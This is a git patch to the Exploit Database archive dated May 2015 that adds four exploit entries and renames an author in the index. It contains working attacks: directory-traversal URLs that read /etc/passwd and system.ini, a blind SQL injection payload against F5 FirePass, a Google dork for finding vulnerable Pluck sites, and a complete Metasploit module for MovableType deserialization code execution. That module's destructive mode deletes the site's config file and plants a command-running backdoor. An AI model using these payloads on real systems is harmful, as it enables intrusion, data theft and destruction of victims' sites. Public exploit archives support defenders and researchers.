From d35a443cc5c1fadcc84490867dc096e4ab61bfb6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 13 May 2015 05:02:11 +0000 Subject: [PATCH] DB: 2015-05-13 4 new exploits --- files.csv | 16 +- platforms/cgi/webapps/36994.txt | 11 ++ platforms/hardware/remote/36995.txt | 18 ++ platforms/php/webapps/36986.txt | 11 ++ platforms/unix/remote/36996.rb | 261 ++++++++++++++++++++++++++++ 5 files changed, 311 insertions(+), 6 deletions(-) create mode 100755 platforms/cgi/webapps/36994.txt create mode 100755 platforms/hardware/remote/36995.txt create mode 100755 platforms/php/webapps/36986.txt create mode 100755 platforms/unix/remote/36996.rb diff --git a/files.csv b/files.csv index 86dc9cb5d..073128aef 100755 --- a/files.csv +++ b/files.csv @@ -31581,11 +31581,11 @@ id,file,description,date,author,platform,type,port 35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0 35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution ""Sandworm"" Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 -35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"Mauricio Correa",hardware,webapps,0 +35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0 35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0 -35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"Mauricio Correa",jsp,webapps,9090 +35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090 35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0 35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow Vulnerability",2010-12-07,"Luigi Auriemma",multiple,remote,0 @@ -31722,7 +31722,7 @@ id,file,description,date,author,platform,type,port 35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0 35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(""/bin/sh\0""_NULL_NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0 35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0 -35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"Mauricio Correa",php,webapps,0 +35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"XLabs Security",php,webapps,0 35313,platforms/php/webapps/35313.txt,"Wordpress SP Client Document Manager Plugin 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80 35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0 35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0 @@ -32209,12 +32209,12 @@ id,file,description,date,author,platform,type,port 35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 '.au' File Remote Buffer Overflow Vulnerability",2011-05-16,KedAns-Dz,windows,remote,0 35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection Vulnerability",2011-05-16,KedAns-Dz,php,webapps,0 35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)",2015-01-11,"prdelka & ‏sfan55",linux,local,0 -35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"Mauricio Correa",hardware,webapps,0 +35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps,0 35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)",2015-01-11,prdelka,linux,local,0 35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app)",2015-01-11,RichardG,linux,local,0 35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0 -35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit DnsProxy.cmd",2015-01-11,"Mauricio Correa",hardware,webapps,0 -35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"Mauricio Correa",hardware,webapps,0 +35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0 +35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0 35752,platforms/php/webapps/35752.txt,"Mambo 'com_docman' 1.3.0 Component Multiple SQL Injection Vulnerabilities",2011-05-16,KedAns-Dz,php,webapps,0 35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon Denial Of Service Vulnerability",2011-05-16,Knud,multiple,dos,0 35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 'login/login.php' Cross Site Scripting Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0 @@ -33248,6 +33248,8 @@ id,file,description,date,author,platform,type,port 36840,platforms/multiple/local/36840.py,"Wireshark <=1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,local,0 36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0 +36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0 +36995,platforms/hardware/remote/36995.txt,"F5 FirePass <= 7.0 SQL Injection Vulnerability",2012-03-14,anonymous,hardware,remote,0 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0 36854,platforms/php/webapps/36854.txt,"Dolphin 7.0.x explanation.php explain Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0 @@ -33369,6 +33371,7 @@ id,file,description,date,author,platform,type,port 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0 36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0 +36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0 36987,platforms/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Stored XSS",2015-05-11,"XLabs Security",hardware,webapps,0 36988,platforms/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - (URL Filter Configuration Panel) Stored XSS",2015-05-11,"XLabs Security",hardware,webapps,0 36989,platforms/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injection Vulnerabilities",2015-05-11,"Filippo Roncari",php,webapps,0 @@ -33376,3 +33379,4 @@ id,file,description,date,author,platform,type,port 36991,platforms/php/webapps/36991.txt,"eFront 3.6.15 - PHP Object Injection Vulnerability",2015-05-11,"Filippo Roncari",php,webapps,0 36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,"John Page",php,webapps,0 36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal Vulnerability",2015-05-11,"John Page",php,webapps,0 +36996,platforms/unix/remote/36996.rb,"SixApart MovableType Storable Perl Code Execution",2015-05-12,metasploit,unix,remote,80 diff --git a/platforms/cgi/webapps/36994.txt b/platforms/cgi/webapps/36994.txt new file mode 100755 index 000000000..b18c882b3 --- /dev/null +++ b/platforms/cgi/webapps/36994.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/52651/info + +WebGlimpse is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. + +Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. + +Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. + +WebGlimpse 2.18.7 is vulnerable; other versions may also be affected. + +http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd \ No newline at end of file diff --git a/platforms/hardware/remote/36995.txt b/platforms/hardware/remote/36995.txt new file mode 100755 index 000000000..0439ebf1c --- /dev/null +++ b/platforms/hardware/remote/36995.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/52653/info + +FirePass is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The following versions of FirePass are affected: +6.0 +6.0.1 +6.0.2 +6.0.2.3 +6.0.3 +6.1 +7.0 + +state=%2527+and+ +(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+ +BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+ \ No newline at end of file diff --git a/platforms/php/webapps/36986.txt b/platforms/php/webapps/36986.txt new file mode 100755 index 000000000..856dfe23c --- /dev/null +++ b/platforms/php/webapps/36986.txt @@ -0,0 +1,11 @@ +# Exploit Title: Pluck 4.7 Directory Traversal +# Google Dork: filetype:php inurl:"/data/modules/albums/albums_getimage.php?image=" +# Date: 08/05/15 +# Exploit Author: Wadeek +# Vendor Homepage: http://www.pluck-cms.org/?file=home +# Software Link: http://www.opensourcecms.com/scripts/redirect/download.php?id=167 +# Version: 4.7 +# Tested on: Xampp on Windows7 +################################################################################### +PoC = http://127.0.0.1/pluck-4_7/data/modules/albums/albums_getimage.php?image=\..\..\..\..\..\..\..\Windows\system.ini +################################################################################### \ No newline at end of file diff --git a/platforms/unix/remote/36996.rb b/platforms/unix/remote/36996.rb new file mode 100755 index 000000000..4db87e056 --- /dev/null +++ b/platforms/unix/remote/36996.rb @@ -0,0 +1,261 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SixApart MovableType Storable Perl Code Execution', + 'Description' => %q{ + This module exploits a serialization flaw in MovableType before 5.2.12 to execute + arbitrary code. The default nondestructive mode depends on the target server having + the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths. + The destructive mode of operation uses only required MovableType dependencies, + but it will noticeably corrupt the MovableType installation. + }, + 'Author' => + [ + 'John Lightsey', + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2015-1592' ], + [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ], + ], + 'Privileged' => false, # web server context + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => ' ', + 'Space' => 1024, + }, + 'Compat' => + { + 'PayloadType' => 'cmd' + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => [['Automatic', {}]], + 'DisclosureDate' => 'Feb 11 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']), + OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false]) + ], self.class + ) + + end + +=begin + +#!/usr/bin/perl + +# generate config parameters for injection checks + +use Storable; + +{ + + package XXXCHECKXXX; + + sub STORABLE_thaw { + return 1; + } + + sub STORABLE_freeze { + return 1; + } + +} + +my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX; +my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj}); +$frozen = unpack 'H*', $frozen; +print "LFI test for storable flaw is: $frozen\n"; + +{ + package DateTime; + use overload '+' => sub { 'ignored' }; +} + +=end + + def check + vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), + 'vars_get' => { + '__mode' => 'retry', + 'step' => 'configure', + 'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078' + } + }) + + unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm") + vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test"); + return Exploit::CheckCode::Safe + end + Exploit::CheckCode::Vulnerable + end + + def exploit + if datastore['DESTRUCTIVE'] == true + exploit_destructive + else + exploit_nondestructive + end + end + +=begin + +#!/usr/bin/perl + +# Generate nondestructive config parameter for RCE via Object::MultiType +# and Try::Tiny. The generated value requires minor modification to insert +# the payload inside the system() call and resize the padding. + +use Storable; + +{ + package Object::MultiType; + use overload '+' => sub { 'ingored' }; +} + +{ + package Object::MultiType::Saver; +} + +{ + package DateTime; + use overload '+' => sub { 'ingored' }; +} + +{ + package Try::Tiny::ScopeGuard; +} + +my $try_tiny_loader = bless {}, 'DateTime'; +my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver'; +my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType'; +my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard'; + +my $data = [$try_tiny_loader, $try_tiny_executor]; +my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data); +$frozen = unpack 'H*', $frozen; +print "RCE payload requiring Object::MultiType and DateTime: $frozen\n"; + +=end + + def exploit_nondestructive + print_status("#{peer} - Using nondestructive attack method") + config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b" + config_payload << payload.encoded.unpack('H*')[0] + config_payload << "7d293b" + config_payload << "23" * (1025 - payload.encoded.length) + config_payload << "0a657869743b" + + print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), + 'vars_get' => { + '__mode' => 'retry', + 'step' => 'configure', + 'config' => config_payload + } + }, 5) + end + +=begin + +#!/usr/bin/perl + +# Generate destructive config parameter to unlink mt-config.cgi + +use Storable; + +{ + package CGITempFile; +} + +my $unlink_target = "mt-config.cgi"; +my $cgitempfile = bless \$unlink_target, "CGITempFile"; + +my $data = [$cgitempfile]; +my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data); +$frozen = unpack 'H*', $frozen; +print "RCE unlink payload requiring CGI: $frozen\n"; + +=end + + def exploit_destructive + print_status("#{peer} - Using destructive attack method") + # First we need to delete mt-config.cgi using the storable injection + + print_status("#{peer} - Sending storable injection to unlink mt-config.cgi") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), + 'vars_get' => { + '__mode' => 'retry', + 'step' => 'configure', + 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769' + } + }) + + if res && res.code == 200 + print_status("Successfully sent unlink request") + else + fail_with(Failure::Unknown, "Error sending unlink request") + end + + # Now we rewrite mt-config.cgi to accept a payload + + print_status("#{peer} - Rewriting mt-config.cgi to accept the payload") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), + 'vars_get' => { + '__mode' => 'next_step', + 'step' => 'optional', + 'default_language' => 'en_us', + 'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1", + 'set_static_uri_to' => '/', + 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/', + } + }) + + if res && res.code == 200 + print_status("Successfully sent mt-config rewrite request") + else + fail_with(Failure::Unknown, "Error sending mt-config rewrite request") + end + + # Finally send the payload + + print_status("#{peer} - Sending payload request") + + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'mt.cgi'), + 'vars_get' => { + 'xyzzy' => payload.encoded, + } + }, 5) + end + +end \ No newline at end of file